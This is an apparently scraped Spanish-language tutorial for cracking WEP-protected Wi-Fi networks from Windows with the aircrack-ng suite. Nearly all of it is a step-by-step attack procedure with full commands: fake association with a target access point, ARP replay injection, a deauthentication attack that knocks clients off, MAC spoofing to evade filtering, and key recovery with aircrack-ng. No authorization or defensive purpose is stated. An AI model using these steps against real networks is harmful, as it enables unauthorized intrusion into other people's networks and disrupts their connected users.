Professional Documents
Culture Documents
postear un manual que iré completando y retocando. Yo recomiendo utilizar GNU/Linux, una distribución como
Backtrack o WifiSlax es una buena elección, si poseeis una tarjeta USB, de momento no hay soporte bajo
Windows, esto funciona con tarjetas PCI, PCMCIA o integradas.
Pre requisitos :
http://www.cursohacker-online.com/de...s/aircrack.zip
Pasos :
airserv-ng -d "commview.dll|debug" -c 1
airodump-ng 127.0.0.1:666
Como véis en lugar de la interfaz de red, especificamos localhost y el puerto en el que escucha airserv.
Información :
BSSID = MAC del AP que queremos atacar
HOST-MAC = MAC de tu tarjeta
Para conseguir tu dirección MAC normalmente ejecutarías ipconfig /all desde una consola de comandos, pero
cuando airserv-ng está funcionando, windows no es capaz de conseguir esa información. Debes conseguir la
MAC antes de que ejecutes airserv-ng o conseguir la MAC haciendo botón derecho en tu conexión wireless
debao de conexiones de red en el panel de control, clicka en propiedades y cuando se abra la página
selecciona "configurar" para tu tarjeta, debajo de la pestaña avanzado hay una lista de "direcciones de red" y
esa es tu MAC.
En ambos escenarios, podemos empezar asociándonos falsamente con el AP ( suponiendo que tiene
autenticación abierta, puede tener WEP y tener autenticación abierta o con clave compartida, pero de
momento no nos vamos a preocupar de eso ).
Si recibes el mensaje "Association Succesful" va todo bien, la inyección funciona, puedes seguir.
Si recibes un error que involucra a la MAC, puede que el filtrado MAC esté activo. En este caso necesitaremos
cambiar nuestra MAC a una que ya esté asociada previamente.
Si recibes gran cantidad de mensajes sobre tipo "Sending Requests", puede que la fuerza de la señal que
recibes del AP sea demasiado débil, acércate y mejorala.
En este punto ya sabemos que nuestra tarjeta funciona en modo monitor y es capaz de inyectar.
Escenario 1. Hay clientes en la red y el AP utiliza protección WEP y autenticación abierta. Resumen.
Requisitos : Haber pueso airserv-ng en funcionamiento con los pasos previos y comprobar si tu tarjeta inyecta.
1. Ejecutamos "airodump-ng 127.0.0.1:666" y nos fijamos en el canal y mac del ap que queremos
atacar( bssid ).
2. Reejecutamos "airodump-ng --bssid BSSID -c canal 127.0.0.1:666 -w captura" ( Usando el bssid y canal
anterior. Esto nos escucha en un canal concreto y para un bssid concreto y lo escribe en el fichero captura)
3. Ejecutamos en otra consola "aireplay-ng -1 0 -e ESSID -a BSSID -h HOST-MAC 127.0.0.1:666" y miramos si
nos da un mensaje de successfull.
3. Ejecutamos "aireplay-ng -3 -b BSSID 127.0.0.1:666" ( Este comando esperará una petición ARP y cuando la
consiga, veremos subir el campo Data/IVs en airodump-ng y un aviso de que ha recibido ARP). Podéis esperar
un rato y quizás lo encuentre por si mismo. Si no para forzarlo seguís en el siguiente paso 4. Si no, saltáis al
paso 5.
4. Ejecutamos en otra consola un ataque de deautenticación "aireplay-ng -0 1 -a BSSID 127.0.0.1:666" ( Aquí
puede ser necesario que cambieis vuestra mac previamente con macchanger ).
5. Cuando veamos en airodump que tenemos unos cuantos paquetes, ejecutamos en otra consola, sin cerrar
airodump-ng, "aircrack-ng captura" y comenzará con el crackeo de la red hasta encontrar la clave.
Necesitaremos al menos unos 10-30 mil paquetes de datos, esto es variable, a veces más.. a veces menos.